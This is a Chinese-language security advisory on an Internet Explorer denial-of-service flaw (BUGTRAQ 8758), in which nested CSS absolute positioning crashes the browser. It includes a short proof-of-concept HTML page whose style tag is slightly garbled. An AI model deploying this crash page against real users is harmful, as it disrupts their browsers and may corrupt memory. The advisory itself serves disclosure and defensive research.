|
Microsoft Internet Explorer处理页面绝对位置远程拒绝服务攻击漏洞(2) - Microsoft Windows 98
- Microsoft Windows 2000 Professional SP2
- Microsoft Windows 2000 Professional SP1
- Microsoft Windows 2000 Professional
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 8758
Microsoft Internet Explorer是一款流行的WEB浏览程序。
Microsoft IE在使用绝对位置(absolute position)时存在问题,远程攻击者可以利用这个漏洞构建恶意页面,诱使用户访问,可导致目标用户浏览器崩溃。
攻击者可以构建包含特殊的绝对位置设置的页面,当浏览器解析时会导致内存破坏而崩溃,目前还不明是否可以用来执行任意代码。根据报告Eudora浏览器也受此漏洞影响。
<*来源:Nick Johnson (arachnid@notdot_net.meta.net.nz)
链接 http://marc.theaimsgroup.com/?l=bugtraq&m=106519692726266&w=2
*>
测试方法:
--------------------------------------------------------------------------------
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Nick Johnson (arachnid@notdot_net.meta.net.nz)提供了如下测试方法:
-----------------------------------------
<html>
<body>
<style type="text/CSS技巧">CSS">
#three {
position: absolute;
}
#one #two {
position: absolute;
}
</style>
<div id="one">
In 'one'
<span id="two">
In 'two'
</div>
<div id="three">
In 'three'
</div>
</body>
-----------------------------------------
建议:
--------------------------------------------------------------------------------
厂商补丁:
Microsoft
---------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.microsoft.com/windows/ie/default.ASP
| 
